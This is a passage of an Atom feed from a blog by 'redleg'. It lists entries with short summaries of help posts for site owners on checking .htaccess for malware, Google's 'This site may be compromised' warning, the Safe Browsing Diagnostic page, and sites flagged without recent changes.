src='http://3.bp.blogspot.com/-mGlNZH1qLXo/Tgy5I67FouI/AAAAAAAAAIo/r61fgcdY07M/s220/redleg.jpg'/></author><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8226343625671207502.post-5464679054496551112</id><published>2010-12-12T22:38:00.024-05:00</published><updated>2012-01-23T08:12:51.833-05:00</updated><title type='text'>How do I check .htaccess for malware</title><summary type='text'>* The .htaccess is an Apache (Apache like) web server system file.  If you are hosted on an IIS server stop reading you will not have a .htaccess file on your site.

The .htaccess file is an Apache system file which provides a way to make configuration changes on a per-directory basis.  The .htaccess file is not a "required" file and may not be present at all on your site.  There can be multiple </summary><link rel='replies' type='application/atom+xml' href='http://redleg-redleg.blogspot.com/feeds/5464679054496551112/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://redleg-redleg.blogspot.com/2010/12/check-htaccess-for-malware.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8226343625671207502/posts/default/5464679054496551112'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8226343625671207502/posts/default/5464679054496551112'/><link rel='alternate' type='text/html' href='http://redleg-redleg.blogspot.com/2010/12/check-htaccess-for-malware.html' title='How do I check .htaccess for malware'/><author><name>redleg</name><uri>http://www.blogger.com/profile/06857850551616773983</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/-mGlNZH1qLXo/Tgy5I67FouI/AAAAAAAAAIo/r61fgcdY07M/s220/redleg.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8226343625671207502.post-8054831548400414051</id><published>2010-12-12T14:51:00.015-05:00</published><updated>2011-09-22T15:48:52.179-04:00</updated><title type='text'>This site may be compromised</title><summary type='text'>While checking your site's performance in the search results you are shocked to see the notice


"This site may be compromised."

below the link to your homepage.  Jeeez Google what now??

The warning "This site may be compromised" from Google is relatively new and has just begun to show up on search results pages.

 Google has explained, "when we are indexing the pages of a site and we </summary><link rel='replies' type='application/atom+xml' href='http://redleg-redleg.blogspot.com/feeds/8054831548400414051/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://redleg-redleg.blogspot.com/2010/12/this-site-may-be-compromised.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8226343625671207502/posts/default/8054831548400414051'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8226343625671207502/posts/default/8054831548400414051'/><link rel='alternate' type='text/html' href='http://redleg-redleg.blogspot.com/2010/12/this-site-may-be-compromised.html' title='This site may be compromised'/><author><name>redleg</name><uri>http://www.blogger.com/profile/06857850551616773983</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/-mGlNZH1qLXo/Tgy5I67FouI/AAAAAAAAAIo/r61fgcdY07M/s220/redleg.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_rvsS1gG1odA/TQUgH0sVAhI/AAAAAAAAAA8/y2oNO6eAXuM/s72-c/may-be-compromised.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8226343625671207502.post-5311442778457165658</id><published>2010-12-12T09:46:00.023-05:00</published><updated>2011-07-08T18:04:30.776-04:00</updated><title type='text'>Google's Safe Browsing Diagnostic page</title><summary type='text'>Well, *&amp;#@ visitors to my site are getting the red screen of death and Google is advising that I check the Safe Browsing Diagnostic page for my site. OK I have checked it, what the heck does it mean?  What can I learn from the page and how is it going to help me in clearing my site?

Google's Safe Browsing Diagnostic page for any site can be accessed at

http://www.google.com/safebrowsing/</summary><link rel='replies' type='application/atom+xml' href='http://redleg-redleg.blogspot.com/feeds/5311442778457165658/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://redleg-redleg.blogspot.com/2010/12/googles-safe-browsing-diagnostic-page.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8226343625671207502/posts/default/5311442778457165658'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8226343625671207502/posts/default/5311442778457165658'/><link rel='alternate' type='text/html' href='http://redleg-redleg.blogspot.com/2010/12/googles-safe-browsing-diagnostic-page.html' title='Google&apos;s Safe Browsing Diagnostic page'/><author><name>redleg</name><uri>http://www.blogger.com/profile/06857850551616773983</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/-mGlNZH1qLXo/Tgy5I67FouI/AAAAAAAAAIo/r61fgcdY07M/s220/redleg.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_rvsS1gG1odA/TQTkEhEBYOI/AAAAAAAAAAw/6BCUGCX8JYE/s72-c/diag-suspicious.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8226343625671207502.post-4235877319847205181</id><published>2010-12-11T14:44:00.013-05:00</published><updated>2011-06-29T17:57:59.303-04:00</updated><title type='text'>Why has Google suddenly flagged my site  (I haven't change anything in 10 years)</title><summary type='text'>So, your site/blog has been published for years, you have not changed anything, posted anything in months and all of the sudden your visitors have started getting warnings? It has to be a mistake, a False Positive, right? Chances are it is not!   
In this post we will discuss a couple of scenarios where you have not changed anything yet your site is serving malware.

The first thing to check is </summary><link rel='replies' type='application/atom+xml' href='http://redleg-redleg.blogspot.com/feeds/4235877319847205181/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://redleg-redleg.blogspot.com/2010/12/why-has-google-suddenly-flagged-my-site.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8226343625671207502/posts/default/4235877319847205181'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8226343625671207502/posts/default/4235877319847205181'/><link rel='alternate' type='text/html' href='http://redleg-redleg.blogspot.com/2010/12/why-has-google-suddenly-flagged-my-site.html' title='Why has Google suddenly flagged my site &lt;br/&gt; (I haven&apos;t change anything in 10 years)'/><author><name>redleg</name><uri>http://www.blogger.com/profile/06857850551616773983</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='http://3.bp.blogspot.com/-mGlNZH1qLXo/Tgy5I67FouI/AAAAAAAAAIo/r61fgcdY07M/s220/redleg.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_rvsS1gG1odA/TQRch3gl7_I/AAAAAAAAAAs/M7N2wDaSLY0/s72-c/diag-page.jpg' height='72' width='72'/><thr:total>0</thr:total></entry></feed>
